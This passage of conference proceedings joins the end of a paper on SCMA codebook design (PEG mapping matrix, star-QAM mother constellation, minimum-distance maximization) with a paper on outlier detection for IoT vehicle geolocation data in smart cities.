comparison and analysis are presented. Finally, Sect. 7 concludes the paper.

2 System Model
The SCMA encoder, responsible for generating the users' codebooks, is defined as a mapping from log2(M) bits to a K-dimensional complex codebook of size M. The constellation points of each codebook are constructed from the MC by constellation segmentation. Then, based on the sparse matrix F, the coded bits are mapped into the SCMA codewords. The K-dimensional complex codewords of the codebook are sparse vectors with N < K non-zero entries. Finally, the SCMA codewords are transmitted over shared orthogonal resources. The received signal can be expressed as:

$$y = \sum_{j=1}^{J} h_j x_j + n \quad (1)$$

where $x_j = (x_{1,j}, x_{2,j}, \ldots, x_{K,j})^T$ is the K-dimensional complex codeword of user j, $h_j$ denotes the channel coefficient of user j, and n is the ambient noise.
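To make the superposition of Eq. (1) concrete, the following minimal Python/NumPy sketch builds toy sparse codewords for J = 6 users over K = 4 resources and forms the received vector y. The random codewords, channel values and noise level are placeholders for illustration only, not the codebooks designed in the rest of the paper.

```python
import numpy as np

rng = np.random.default_rng(0)
J, K, N = 6, 4, 2                      # users, shared resources, non-zero entries per codeword

# toy sparse codewords: each user occupies N of the K resources (the support of column j of F)
x = np.zeros((J, K), dtype=complex)
for j in range(J):
    support = rng.choice(K, size=N, replace=False)
    x[j, support] = rng.normal(size=N) + 1j * rng.normal(size=N)

h = rng.normal(size=J) + 1j * rng.normal(size=J)           # per-user channel coefficients
n = 0.01 * (rng.normal(size=K) + 1j * rng.normal(size=K))  # ambient noise

y = (h[:, None] * x).sum(axis=0) + n                       # Eq. (1): y = sum_j h_j * x_j + n
print(y)
```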


3 Sparse Mapping Matrix F with PEG
The relationship between users and subcarriers is determined by a sparse mapping matrix F, which also determines the decoder complexity. Here, we propose to design the matrix F with the PEG algorithm. The PEG algorithm is a construction method used for LDPC codes, and its high flexibility makes it a good candidate to generate codes of any block length [7], and hence the SCMA mapping matrix F. A bipartite graph with K check nodes (rows) and J symbol nodes (columns) can be created from F; such a graph is also called a Tanner graph (Fig. 1). The symbol degree sequence Ds = {ds1, ds2, ..., dsJ} denotes the number of check nodes connected to each symbol node.

Fig. 1 Factor graph representation of an SCMA system with J = 6, K = 4 and Ds = {2, 2, 2, 2, 2, 2}.

Given the graph parameters, namely the number of symbol nodes J, the number of check nodes K, and the symbol node degree sequence Ds, the node connections are made according to Algorithm 1.
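As a rough illustration of how a PEG-style construction can produce the mapping matrix F, the sketch below greedily attaches each symbol-node edge to the check node that is currently farthest away (or still unreachable), breaking ties by the lowest check-node degree. It is a simplified sketch under our own assumptions, not a reproduction of Algorithm 1, and the resulting row degrees are balanced only heuristically.

```python
import numpy as np
from collections import deque

def peg_mapping_matrix(K, J, ds, seed=0):
    """Greedy PEG-style construction of a K x J binary mapping matrix F."""
    rng = np.random.default_rng(seed)
    F = np.zeros((K, J), dtype=int)

    def check_node_depths(j):
        # BFS over the current bipartite graph starting from symbol node j
        depth, queue = {("s", j): 0}, deque([("s", j)])
        while queue:
            kind, idx = queue.popleft()
            if kind == "s":
                neigh = [("c", k) for k in range(K) if F[k, idx]]
            else:
                neigh = [("s", s) for s in range(J) if F[idx, s]]
            for node in neigh:
                if node not in depth:
                    depth[node] = depth[(kind, idx)] + 1
                    queue.append(node)
        return {k: d for (kind, k), d in depth.items() if kind == "c"}

    for j in range(J):
        for _ in range(ds[j]):                        # place ds[j] edges for symbol node j
            reach = check_node_depths(j)
            dist = np.array([reach.get(k, np.inf) for k in range(K)], dtype=float)
            dist[F[:, j] == 1] = -1.0                 # never duplicate an existing edge
            far = np.flatnonzero(dist == dist.max())  # unreachable or farthest check nodes
            degs = F[far].sum(axis=1)
            k = rng.choice(far[degs == degs.min()])   # lowest-degree tie-break
            F[k, j] = 1
    return F

F = peg_mapping_matrix(K=4, J=6, ds=[2] * 6)
print(F)
print("resource degrees:", F.sum(axis=1))             # ideally df = 3 for (J, K, N) = (6, 4, 2)
```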


4 SCMA Codebook Design
4.1 Mother Constellation (MC)
For the multidimensional constellation design, SCMA offers more degrees of freedom than previous techniques [8]. Thus, we choose a constellation with a large MED that avoids collisions between users. Here, we propose to design the MC using a 16-star QAM constellation, which is then extended and built on four ring signal sets with radii Ri, as shown in Fig. 2.

Fig. 2 (a) Constellation of round 16 QAM. (b) Proposed constellation.

Where |OA| = R1, |OB| = R2, |OC| = R3, |OD| = R4. In the general case, the MC parameters can be written as:

$$MC = \begin{pmatrix} x_1 & x_2 & \alpha x_1 & \beta x_2 \\ -x_1 & -x_2 & -\alpha x_1 & -\beta x_2 \\ x_1 e^{i\theta} & x_2 e^{i\theta} & \alpha x_1 e^{i\theta} & \beta x_2 e^{i\theta} \\ -x_1 e^{i\theta} & -x_2 e^{i\theta} & -\alpha x_1 e^{i\theta} & -\beta x_2 e^{i\theta} \end{pmatrix} \quad (2)$$

where the length of the sequences is equal to M, with x2 = βx1. We define the ratio between two successive points in the IQ constellation diagram as R2/R1 = R4/R3 = β, the ratio between non-successive points as R3/R1 = R4/R2 = α, and θ ∈ [0, 2π]. With (J, M, N, K) = (6, 4, 2, 4), in order to generate the MC defined by Eq. (2) we need to determine the three parameters (α, β and θ), from which the four radii (R1, R2, R3 and R4) are obtained. We set x1 = R1 and x2 = R2. According to [9], to maximize the minimum distance between two adjacent points of a 16-star QAM, the internal ring is rotated by 22.5 degrees with respect to the external ring, θ = 22.5°, and the ratio between the internal radius and the external one turns out to be about 0.63, i.e. β = 1/0.63. According to [3], to maximize both the sum distance and the MED of the MC, the best value is α = 3, which maintains the balance between the two distances.
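As a quick numerical check of this construction, the sketch below builds the four ring radii from α = 3, β = 1/0.63 and θ = 22.5° and assembles a mother constellation whose columns are the radii R1–R4 used later in Eq. (5); the computed MED (about 0.39) is close to the value 0.3815 quoted in Sect. 5, the small gap coming from rounding of the rotation angle. This is an illustrative sketch, not the authors' exact construction.

```python
import numpy as np

alpha, beta = 3.0, 1 / 0.63                   # ring ratios from Sect. 4.1
theta = np.deg2rad(22.5)                      # rotation of the two rotated rows
rot = np.exp(1j * theta)

R = np.array([1.0, beta, alpha, alpha * beta])   # R1, R2, R3, R4 (as in Eq. (5))
MC = np.vstack([R, -R, R * rot, -R * rot])       # 4 x 4 mother constellation

pts = MC.flatten()
med = min(abs(a - b) for i, a in enumerate(pts) for b in pts[i + 1:])
print(np.round(R, 4))    # [1.     1.5873 3.     4.7619]
print(round(med, 4))     # ~0.3902 (0.3815 in the paper, see Sect. 5)
```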


4.2 Sub-constellation Generation with MED Maximization
The codebook elements are built from sub-constellations derived from the MC, where each codebook row (codebook dimension) is represented by a sub-constellation. In general, each user needs M = 2^m codewords to transmit its data. For a 16-QAM MC, the MC therefore needs to be divided into df sub-constellations, each with M points. The idea behind this algorithmic approach is to extract the sub-constellations with the largest MED from the multiple choices offered by the divisions of the mother constellation.

4.3 SCMA Codebook Generation by Sub-constellation Mapping with MED Maximization
At the end of the division procedure, we have df sub-constellations generated from the mother constellation. The set of these sub-constellation point sets is denoted {C1, C2, ..., Cdf}, such that each subset contains M constellation points. Next, we map


these sets to the users' codebooks using the mapping matrix F as follows:

$$CM(i, j) = \begin{cases} C_i^{(r)} & \text{if } f_{ij} = 1 \\ 0 & \text{if } f_{ij} = 0 \end{cases} \quad (4)$$



where Ci(r) is the r-th value after a specific reordering of the set {C1, C2, ..., Cdf}. In the mapping matrix F, we replace the elements "1" with Ci(r), where i denotes the subcarrier corresponding to the i-th row of the matrix and j denotes the user corresponding to the j-th column. In addition to maximizing the AP-MED, our objective is also to maximize the MED between the users' codewords sharing the same carrier. To this end, we project the sub-constellations onto the overlapping subcarrier and then calculate the distances between the superimposed codewords. The ordering of the sets that achieves the largest CW-MED is retained to form the desired codebook.
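The CW-MED described above can be evaluated directly: for one resource element shared by U users, enumerate all superimposed codewords (one point from each user's sub-constellation) and take the minimum pairwise distance. The sketch below does this for three illustrative 4-point sets standing in for the actual C1, C2, C4 of Sect. 5, whose exact point assignments are produced by the division algorithm and are not repeated here.

```python
import numpy as np
from itertools import product

def cw_med(subsets):
    """MED of the superimposed codewords of the users sharing one resource element."""
    sums = np.array([sum(combo) for combo in product(*subsets)])
    iu = np.triu_indices(len(sums), k=1)
    return np.abs(sums[iu[0]] - sums[iu[1]]).min()

# illustrative 4-point sub-constellations (placeholders, not the paper's exact C1, C2, C4)
C1 = np.array([1, -1, 1j, -1j])
C2, C4 = 1.587 * C1, 4.76 * C1
print(round(cw_med([C1, C2, C4]), 4))
```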

5 Design Example
In this section, we generate the SCMA schemes using Matlab. First, we generate the mapping matrix F using the PEG algorithm. For (J, M, N, K) = (6, 4, 2, 4) and a symbol degree sequence Ds = {2, 2, 2, 2, 2, 2}, the mapping matrix F is given by:

For α = 3, β = 1.587 and θ = 22.5°, we set R1 = 1, which gives R2 = 1.587, R3 = 3, and R4 = 4.7619. Based on Eq. (2), the mother constellation MC can be written as:

$$MC = \begin{pmatrix} 1 & 1.587 & 3 & 4.7619 \\ -1 & -1.587 & -3 & -4.7619 \\ 0.9272 + 0.3745i & 1.4715 + 0.5944i & 2.7816 + 1.1236i & 4.4144 + 1.7832i \\ -0.9272 - 0.3745i & -1.4715 - 0.5944i & -2.7816 - 1.1236i & -4.4144 - 1.7832i \end{pmatrix} \quad (5)$$

These are the optimal coordinates to construct an MC with a large MED. For the number of divisions we have df = 4, so we derive the four sub-constellations from Eq. (5) using Algorithm 2. The resulting sub-constellations are C1, C2, C3 and C4, obtained after two divisions. Initially the MC had an MED equal to 0.3815; after the two divisions we managed to increase the MED, with dmin(C1) = 2.1064, dmin(C2) = 3.3428, dmin(C3) = 2.1064 and dmin(C4) = 3.3428. With U the number of overlapping users, the optimal combinations of U = 3 sub-constellations from {C1, C2, C3, C4} that achieve the highest CW-MED are {C1, C2, C4} and


{C2, C3, C4}. Finally, to form the optimized codebooks, we use Eq. (4) and the two combination sets with the highest CW-MED, as follows:

$$CM_{i,j} = \begin{pmatrix} C_1 & 0 & C_2 & 0 & C_4 & 0 \\ C_2 & 0 & 0 & C_3 & 0 & C_4 \\ 0 & C_2 & C_4 & 0 & 0 & C_1 \\ 0 & C_1 & 0 & C_4 & C_2 & 0 \end{pmatrix} \quad (6)$$

6 Numerical Results and Analysis

Fig. 3 Comparison of the MED between adjacent points within the same codebook (AP-MED) and of the MED of the superimposed codewords (CW-MED) for Shunlan [2018], SVD-SCMA [2020], DCSC-SCMA [2021] and the proposed SCMA codebooks.

Figure 3 shows that the proposed codebooks perform better with respect to both MEDs, AP-MED and CW-MED. However, our study was limited to the optimization of the MEDs, while the other papers investigated additional factors. In [6], the authors aimed to balance the MC power, placing the codebook design under power constraints. In [5], the authors focus on designing an MC based on singular value decomposition (SVD) with a higher MED, and then apply a specific operator to the MC to generate the different users' codebooks, in which the AP-MED stays unchanged; with our proposed method, in contrast, we generate different codebooks, each with different distances, while the minimum distance is equal to 2.11. The authors in [3] mainly focused on maximizing the AP-MED of the codebook while neglecting the CW-MED optimization, which resulted in a low CW-MED equal to 0.3. In our paper, we optimized the codebook first with respect to the AP-MED and then adjusted the resulting sub-constellations to achieve a high CW-MED.


7 Conclusion
This paper mainly introduces the detailed procedure of the codebook design: 1) using the PEG algorithm to create the mapping matrix F; 2) forming the mother constellation, then generating sub-constellations while maximizing the MED criterion; 3) generating the SCMA codebook by combining the sub-constellations with the mapping matrix, again maximizing the MED criterion. The comparison shows good results in terms of the MED maximization criterion; other aspects, such as spectral efficiency, remain to be studied. A BER simulation of the entire system (transmitter + receiver) is also needed to further confirm the performance of the proposed codebooks.

References 1. Ding, Z., et al.: Application of non-orthogonal multiple access in LTE and 5G networks. IEEE Commun. Mag. 55(2), 185–191 (2017). https://doi.org/10.1109/MCOM.2017.1500657CM 2. Deka, K., Priyadarsini, M., Sharma, S., Beferull-Lozano, B.: Design of SCMA codebooks using differential evolution. ArXiv200303569 Cs Eess Math, February 2021 (2022). http:// arxiv.org/abs/2003.03569 3. Liu, S., Wang, J., Bao, J., Liu, C.: Optimized SCMA codebook design by QAM constellation segmentation with maximized MED. IEEE Access 6, 63232–63242 (2018). https://doi.org/10. 1109/ACCESS.2018.2876030 4. Wang, Q., Li, T., Feng, R., Yang, C.: An efficient large resource-user scale SCMA codebook design method. IEEE Commun. Lett. 23(10), 1787–1790 (2019). https://doi.org/10.1109/ LCOMM.2019.2929766 5. Vidal Beltran, S., Carreño Aguilera, R., Lopez Bonilla, J.L.: Sparse code multiple access codebook design using singular value decomposition. Fractals 28(07), 2150021 (2020). https:// doi.org/10.1142/S0218348X21500213 6. Hou, Z., Xiang, Z., Ren, P., Cao, B.: SCMA Codebook design based on decomposition of the superposed constellation for AWGN channel. Electronics 10(17), 2112 (2021). https://doi.org/ 10.3390/electronics10172112 7. Healy, C.T.: Novel irregular LDPC codes and their application to iterative detection of MIMO systems, p. 85 (2010) 8. Lisu, Y., Fan, P., Cai, D., Ma, Zheng: Design and analysis of SCMA codebook based on Star-QAM signaling constellations. IEEE Trans. Veh. Technol. 67(11), 10543–10553 (2018). https://doi.org/10.1109/TVT.2018.2865920 9. Celidonio, M., Di Zenobio, D.: An independent sharing of two 16-star QAM broadcast channels. In: Proceedings of 6th International Symposium on Personal, Indoor and Mobile Radio Communications, Toronto, ON, Canada, vol. 1, p. 115-119 (1995). https://doi.org/10.1109/ PIMRC.1995.476415

Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities Moulay Lakbir Tahiri Alaoui(B) , Meryam Belhiah, and Soumia Ziti Intelligent Processing and Security of Systems, Faculty of Sciences, Mohamed V University in Rabat, Rabat, Morocco {lakbir.tahiri,m.belhiah,s.ziti}@um5r.ac.ma

Abstract. In a connected world, the growing attention given to the IoT (Internet of Things) is driven by its economic, societal, and ecological impact among others as well as its vast applications and services. The insights provided by these applications and services are based on the data gathered from different networks of IoT sensors. A poor quality of data forwarded to control centers may lead to ill-informed decisions, inadequate services, and thus impact adversely the business objectives. In this paper, we will address the parameters that influence the levels of Data Quality (DQ) in the context of IoT devices. These issues may be due to errors in measurements, precision of data collection devices, energy restrictions, intermittent connectivity, interference with other devices, sampling frequency, noisy environment, and data volume among others. On the other hand, DQ levels are evaluated against a set of dimensions. Herein, we will focus our research on the most important dimensions for end users, such as accuracy, completeness, and timeliness. Keywords: Internet of Things · Data quality · Outlier Detection

1 Introduction
Data quality levels are evaluated against a set of dimensions. They are affected by the different IoT layers, from the physical layer to the network and application layers. In this paper, we focus on data gathered from vehicles that are equipped with IoT sensors along with a GPS/GPRS or an A-GPS/GPRS module for geolocation. As outlier detection (OD) is a major problem in both the IoT and DQ domains, it is also addressed as a sub-domain of DQ. OD is a complex matter, since received data that seems abnormal may in fact be within the norms; in this case, what is expected to be an outlier may be valuable information that should not be discarded, as in health diagnosis. Many techniques and methods are used for OD, each suited to specific domains. A model will be developed to detect outliers; once the model is validated and tested, it will be possible to generalize it to other types of IoT data. The first chapter presents the theoretical framework for this work and develops the topics of the IoT paradigm, Data Quality and Outlier Detection. Techniques for OD will be


presented and classified. We will describe the most used techniques such as statistic-, distance-, density- and learning based methods. In the second chapter, a technique to detect outliers in the field of geolocation data in the context of IoT enabled smart cities will be recommended. We will conclude with the future research direction in the domain of IoT, smart cities and data quality.

2 Related Work 2.1 IoT Paradigm: Definition, Layers and Enabling Technologies The IoT concept was coined by a member of the Radio Frequency Identification (RFID) development community in 1999, and it has recently become more relevant to the practical world largely because of the growth of mobile devices, embedded and ubiquitous communication, cloud computing and data analytics [1]. Internet of things can be defined as a network of physical objects. The internet of things is not only a network of computers, but it has evolved into a network of device of all type and sizes, vehicles, smart phones, home appliances, toys, cameras, medical instruments and industrial systems, animals, people, buildings, all connected ,all communicating & sharing information based on stipulated protocols in order to achieve smart reorganizations, positioning, tracing, safe & control & even personal real time online monitoring , online upgrade, process control & administration [2]. Internet of Things is a concept and a paradigm that considers pervasive presence in the environment of a variety of things/objects that through wireless and wired connections and unique addressing schemes are able to interact with each other and cooperate with other things/objects to create new applications/services and reach common goals. In this context the research and development challenges to create a smart world are enormous. A world where the real, digital and the virtual are converging to create smart environments that make energy, transport, cities and many other areas more intelligent [2]. The goal of the Internet of Things is to enable things to be connected anytime, anywhere, with anything and anyone ideally using any path/network and any service. 2.2 Data Quality: Definition, Dimensions and Issues In the OMB (Office of Management and Budget) guidelines, data quality is expressing data “utility, objectivity, and integrity.” [3] Data Quality may be defined also as “data quality cannot be resumed to data accuracy. Other significant dimensions such as completeness, consistency, and currency are necessary in order to fully characterize the quality of data.” [3] 2.2.1 Data Quality Dimensions “Data of low quality deeply influences the quality of business processes” [3], a number of dimensions is used to measure DQ, accuracy is the most important in IoT [4], it measures the extent to which an observation reflects the real world. It is tidious to detect faults related to accuracy since data control against an authoritative source of reference is required. Then comes timeliness, the IoT data is considered timely when an observation


for an object was updated at a desired time of interest [5]. Completeness is an important dimension for DQ measurement; it represents the extent to which all expected data is provided by the IoT devices [5]. Table 1 summarizes further definitions of the above dimensions.

Table 1. Data quality dimensions description

Accuracy: Data are accurate when data values registered in the database are equal to real-world values [6, 7]. Measures how correct, reliable and certified data is [8]. Accuracy compares the proximity of a data value, v, to some other value, v', that is considered correct [7, 10].

Completeness: The ability of an information system to represent every meaningful state of the represented real-world system [6, 7]. The extent to which data are of sufficient breadth, depth and scope for the task at hand [8]. The degree to which values are present in a data collection [7, 9]. The percentage of the real-world information entered in the sources and/or the data warehouse [7, 10]. Information having all required parts of an entity's information present [7, 11].

Timeliness: The extent to which the age of the data is appropriate for the task at hand [8]. The delay between a change of a real-world state and the resulting modification of the information system state [7, 12]. Timeliness has two components: age and volatility. Age or currency is a measure of how old the information is, based on how long ago it was recorded. Volatility is a measure of information instability, i.e., the frequency of change of the value for an entity attribute [7, 11].

2.2.2 Trade-offs Between Dimensions Data quality dimensions are not independent, i.e., correlations exist between them. If one dimension is considered more important than the others for a specific task at hand, then the choice of favoring it may imply negative consequences for the other ones [3].


2.2.3 Data Quality Issues in the Context of IoT Data harvested from different and heterogeneous IoT objects that are spread globally are characterized by different kinds of problems that affect their quality. In the following, we will address the most common problems that impact data quality in the context of IoT. As shown in Fig. 1, the issues may be related to the three IoT layers: physical layer, network layer or application layer.

Fig. 1. Layered distribution of IoT factors [13]

• Problems related to the physical layer:
  • Maintenance: the sensors may be located in hard-to-reach areas, making maintaining and replacing these devices difficult and costly;
  • Vandalism: devices are located in public, accessible spaces and are thus an easy prey for all kinds of vandalism;
  • Faulty devices: a faulty sensor may still generate unsound data, which will impact the whole process of executing services and generating business insights;
  • Sensor constraints: being low cost, sensors are not of the best quality and their capacities are limited; this affects all features, such as battery life and connectivity.
• Problems related to the network layer:
  • Noise: climatic conditions impact the signal frames received by the sensors;
  • Security: ciphering the gathered data increases the number and size of transmitted packets and the computational time needed to encrypt and decrypt frames, which may delay real-time insights;
  • Intermittent connectivity: devices that are unreachable during data-connection frames impact the receiving and computing process at the service center;
  • Interference: with the huge number of heterogeneous devices transmitting at the same time, signals interfere, which reduces the received signal quality.


• Problems related to the application layer:
  • Heterogeneity: tremendous amounts of data are gathered from different types of sensors in different places of the world, which affects the interpretation of the frames.

2.3 Outlier Detection: Definition and Techniques
An outlier is a data point that deviates from normal behavior. Unexpected values may be measurement errors or sampling errors, but they can also correspond to true values. When the insight is of no particular interest, the outlier may be deleted or treated as a lost data value, and an alarm or a warning may be generated; however, the data may also be an interesting insight that should be exploited. Given the thin line between normal and abnormal behavior, many studies have been performed to detect outliers and many techniques have been applied. Many techniques that use different methods and algorithms have been proposed to address OD (Fig. 2). These methods can be split into categories; for each category, we give a description and its challenges, with the pros and cons.

Fig. 2. Outlier detection methods [14]

• Statistical-based methods: these methods are used to detect sensor faults and outliers when the gathered data follow a known model, in the case of parametric methods. The measured values are directly compared with the model and evaluated as outliers when the data differ from the expected values, as shown in Fig. 3. For statistical methods where the model is not known, we speak of non-parametric methods [14]; Kernel Density Estimation, for instance, detects outliers in this way. For a given distribution model, this is an efficient method that can be easily implemented with a low computational cost (it does not need many resources in terms of program complexity, CPU and execution time). In the real world, however, the distribution is not always known and the method cannot then be applied.
• Distance-based methods: the underlying principle of the distance-based detection algorithms (Fig. 4) focuses on the distance computation between observations [16].


Fig. 3. Outlier statistic-based method. [15]

We can cite the method based on a distance threshold as well as k-Nearest Neighbors (KNN) [16]. This is a more realistic method since it does not depend on the distribution and scales to large data compared with statistical methods, but it is expensive for multivariate and high-dimensional data.

Fig. 4. Outlier distance-based method [17]


• Density-based methods: in this method an inlier is found in a high-density region while an outlier is located in a low-density region (Fig. 5). This method is effective but remains unsuitable for large volumes of data [15]. The Local Outlier Factor (LOF) is one of the well-known algorithms using this technique [18] (a short illustrative sketch of these three families follows Fig. 5).

Fig. 5. Outlier density-based method [19]
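To make the three families above more concrete, the sketch below applies a statistic-based check (z-score against an assumed Gaussian model), a simple distance-based check (mean distance to the k nearest neighbours), and a density-based check (scikit-learn's LocalOutlierFactor) to a one-dimensional stream of synthetic sensor readings. The data, thresholds and neighbourhood sizes are illustrative assumptions, not values from this study.

```python
import numpy as np
from sklearn.neighbors import LocalOutlierFactor

rng = np.random.default_rng(0)
x = np.concatenate([rng.normal(20.0, 1.0, 200), [35.0, 4.0]])  # readings plus two injected anomalies

# statistic-based: z-score against an assumed Gaussian model of the data
z = np.abs(x - x.mean()) / x.std()
stat_out = np.flatnonzero(z > 3)

# distance-based: mean distance to the k = 5 nearest neighbours above an illustrative threshold
d = np.abs(x[:, None] - x[None, :])
knn_dist = np.sort(d, axis=1)[:, 1:6].mean(axis=1)
dist_out = np.flatnonzero(knn_dist > 3.0)

# density-based: Local Outlier Factor (LOF); flagged points are labelled -1
lof = LocalOutlierFactor(n_neighbors=20)
dens_out = np.flatnonzero(lof.fit_predict(x.reshape(-1, 1)) == -1)

print(stat_out, dist_out, dens_out)   # the injected anomalies (indices 200, 201) appear in all three
```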

Other techniques exist for outlier detection, such as ensemble-based and learning-based methods. The choice of a method depends on many parameters, such as cost, computational complexity, the number of dimensions to take into consideration, and the volume of data to process. Each method can be effective for one domain but not for others. Learning-based approaches, which have been applied in many fields, especially machine learning and deep learning, interact with the user and are efficient in detecting outliers despite their computational cost, especially as the data size grows. Table 2 summarizes the different methods with their advantages and drawbacks.

3 Towards a Model for Outlier Detection in IoT-Enabled Smart Cities
3.1 Data Quality for Geolocation Services
The application layer in IoT is growing very fast, with a large number of applications related to smart living, smart energy, smart home, smart health, smart industry, and smart transport, among others. This work focuses on data gathered from vehicles equipped with IoT modules and GPS (Global Positioning System) modules for geolocation. As a first step, these data will be used to develop a model for detecting positions that may represent outliers.


Table 2. Outlier methods: advantages and drawbacks
Statistic-based | Advantages: effective for given distribution models | Drawbacks: cannot be applied when the distribution is unknown
Distance-based | Advantages: does not depend on the data distribution | Drawbacks: expensive for multivariate, high-dimensional data
Density-based | Advantages: more effective | Drawbacks: remains unsuitable for large data

Once the model is validated and tested, it will be generalized to other types of data. Data gathered from geolocation modules suffer from the same problems as the sensor data discussed above: "exact localization may be impossible, e.g., due to nodes lacking Global Positioning System (GPS) access for reasons of cost, energy, or signal unavailability" [22]. Noise and errors that may be present in geolocation data need to be filtered and corrected in a pre-treatment phase. The computational program should also include the identification of vehicles. Based on the methods studied in the previous chapter, we describe below a procedure that can control received data to detect outliers.

3.2 Recommended Method for OD
Vehicles equipped with an IoT device transmit a number of variables that can be used for the geolocation service. Each transmitted frame reports the vehicle identification, acceleration, speed (velocity), time stamp, and location. Velocity is the rate of change of displacement, and acceleration is the rate of change of velocity. For each car there is a maximum possible acceleration, known and given by the vehicle manufacturer (acceleration_max). If the received acceleration is greater than acceleration_max, the value is considered an outlier. Suppose a vehicle A is moving (being in a moving state requires a minimum speed, speed_min). Once a location is received placing this vehicle at a position C1(X1, Y1, t1) (abscissa, ordinate and time), the next position received at t2 (with a speed speed1) must be a position C2(X2, Y2, t2) whose distance from C1 cannot exceed speed1*(t2 - t1). A pre-treatment of the received sample can be performed to filter the data and make sure the DQ dimensions have the required quality before storing the data in the database, and to verify whether any of the variables represents an outlier. Having all variables in the frame (ID, time, Xn, Yn, speed, acceleration) ensures the data is complete; the value of the time parameter helps decide about the timeliness dimension; and the values of the received variables decide about the data accuracy.


Since the speed is a continuous function and cannot exceed the allowed Speed_max, and samples are taken at time intervals, the distance C1C2 cannot exceed Speed_max*(t2 - t1) and also cannot exceed 1.5*speed1*(t2 - t1). When a vehicle is stopped (for example at a red light), its speed changes promptly when the light turns green, which differs from the case of a car already in movement: if the speed at time tn is 60 km/h, the speed cannot jump to 90 km/h at the next sample, especially if the sampling period is short. To be effective, the parameter speed_new_value should not exceed 1.5*speed_old_value, which is ensured as long as the moving vehicle has a speed greater than speed_min. The direction may change during the movement. Under all these conditions, the new location will necessarily lie in a circle having C1 as its center and C1C2 as its radius, and we can conclude that C1C2 < min(Speed_max*(t2 - t1), 1.5*speed1*(t2 - t1)). All values inside the circle are considered acceptable; the others are outliers, as shown in Fig. 6.

Fig. 6. Outlier detection in case of Geolocation
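A minimal sketch of the feasibility-circle check described above is given below; the speed, acceleration and sampling values are hypothetical, and in practice acceleration_max, speed_min and the maximum allowed speed would come from the vehicle manufacturer and local regulations.

```python
import math

SPEED_MAX = 180 / 3.6      # m/s, assumed maximum plausible vehicle speed
SPEED_MIN = 1.0            # m/s, below this the vehicle is considered stopped
ACC_MAX = 6.0              # m/s^2, assumed manufacturer acceleration limit

def is_outlier(prev, new):
    """prev/new: dicts with x, y (m), t (s), speed (m/s), acc (m/s^2) from one vehicle."""
    dt = new["t"] - prev["t"]
    if dt <= 0 or new["acc"] > ACC_MAX:
        return True                                   # stale timestamp or impossible acceleration
    dist = math.hypot(new["x"] - prev["x"], new["y"] - prev["y"])
    if prev["speed"] >= SPEED_MIN:                    # vehicle was already moving
        # feasibility circle: C1C2 < min(Speed_max*(t2-t1), 1.5*speed1*(t2-t1))
        if dist > min(SPEED_MAX * dt, 1.5 * prev["speed"] * dt):
            return True
        if new["speed"] > 1.5 * prev["speed"]:        # speed should not jump by more than 50%
            return True
    return False

c1 = {"x": 0.0, "y": 0.0, "t": 0.0, "speed": 16.7, "acc": 1.0}     # ~60 km/h
c2 = {"x": 200.0, "y": 0.0, "t": 10.0, "speed": 18.0, "acc": 1.2}  # 200 m travelled in 10 s
print(is_outlier(c1, c2))   # False: C2 lies inside the feasibility circle of Fig. 6
```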

4 Conclusion
Data of low quality impacts services and citizens' satisfaction. This study described different DQ challenges related to the IoT layers: physical layer, network layer and application layer. Data quality is measured via a number of dimensions; accuracy, completeness and timeliness are described and studied. OD is a major problem in both the IoT and DQ domains: data suspected to be an outlier may be a valuable insight that cannot be discarded or ignored, especially in sensitive domains.


Different methods and techniques to detect outliers have been studied and a comparison between them presented. Statistic-based methods are effective for given distribution models but cannot be applied when this distribution is unknown; distance-based methods do not depend on the data distribution but are expensive for multivariate and high-dimensional data; density-based methods are more effective but remain unsuitable for large data. A model for outlier detection in the case of smart cities has been presented. Data gathered from IoT sensors placed in vehicles with a GPS module is pre-treated to filter the data based on the dimensions fixed earlier: the data should be accurate, on time and complete, and should fulfill a number of conditions before proceeding with data analysis. Data with an unsound speed, with acceleration values that cannot match the vehicle characteristics, or carrying an outdated insight will be filtered and discarded. The remaining data will be analyzed to check whether the received position is an outlier, using a calculation based on the received data and the previous insight. Data quality is still a fertile field in which studies are ongoing, especially with the fast evolution of all telecommunication subdomains (sensors, transport speed, latency, computational programs, CPU). The choice of a method to detect outliers depends on many parameters. Nowadays we can benefit from 5G and 6G smart services enabled by UAVs (unmanned aerial vehicles) and a wide range of IoT services, although it is important to underline the cost of such services and the reduced coverage of this new technology.

References 1. Patel, K.K., Patel, S.M.: Internet of things-IoT: definition, characteristics, architecture, enabling technologies, application & future challenges. Int. J Eng. Sci. Comput. 6.5 (2016) 2. Vermesan, O., Friess, P., eds.: Internet of things: converging technologies for smart environments and integrated ecosystems. River Publishers (2013) 3. Carey, M.J., et al.: Data-Centric Systems and Applications. Springer, Italy (2006) 4. Liu, C., Nitschke, P., Williams, S.P., Zowghi, D.: Data quality and the internet of things. Computing 102(2), 573–599 (2019). https://doi.org/10.1007/s00607-019-00746-z 5. Li, F., Nastic, S., Dustdar, S.: Data quality observation in pervasive environments. In: Proceeding of the 15th International Conference Computer Science Engineering, pp 602–609. IEEE (2012) 6. Ballou, D.P., Pazer, H.L.: Modeling data and process quality in multi-input, multi-output information systems. Manage. Sci. 31(2), 150–162 (1985) 7. Batini, C., Cappiello, C., et al.: Methodologies for data quality assessment and improvement. ACM Comput. Surv. 41(3), 1–52 (2009). https://doi.org/10.1145/1541880.1541883 8. Wang, R.Y., Strong, D.M.: Beyond accuracy: What data quality means to data consumers. J. Manag. Inf. Syst. 12(4), 5–33 (1996) 9. Redman, T.C., Blanton, A.: Data quality for the information age, 1st Edn., ACM Digital Library, Artech House, Inc., Norwood, MA, USA (1997). [ISBN:0890068836] 10. Jarke, M., Lenzerini, M., et al.: Fundamentals of data warehouses, SIGMOD record, SpringerVerlag, vol 32(2), 55–56 (2003). [ISBN: 3–540–42089–4]


11. Bovee, M., Srivastava, R.P., et al.: A conceptual framework and belief-function approach to assessing overall information quality. Int. J. Intell. Syst. 18(1), 51–74 (2003)
12. Wand, Y.W.: Anchoring data quality dimensions in ontological foundations. Commun. ACM 39(11), 86–95 (1996)
13. Karkouch, A., et al.: Data quality in internet of things: a state-of-the-art survey. J. Netw. Comput. Appl. 73, 57–81 (2016)
14. Suri, N.N.R.R., Murty, M., Athithan, G.: Data mining techniques for outlier detection. In: Visual Analytics and Interactive Technologies: Data, Text and Web Mining
14. Raju, A.S., Rashid, M.M., Sabrina, F.: Performance enhancement of intrusion detection system using machine learning algorithms with feature selection. In: 2021 31st International Telecommunication Networks and Applications Conference (ITNAC). IEEE (2021)
15. Wang, H., Jaward Bah, M., Hammad, M.: Progress in outlier detection techniques: a survey. IEEE Access 7, 107964–108000 (2019)
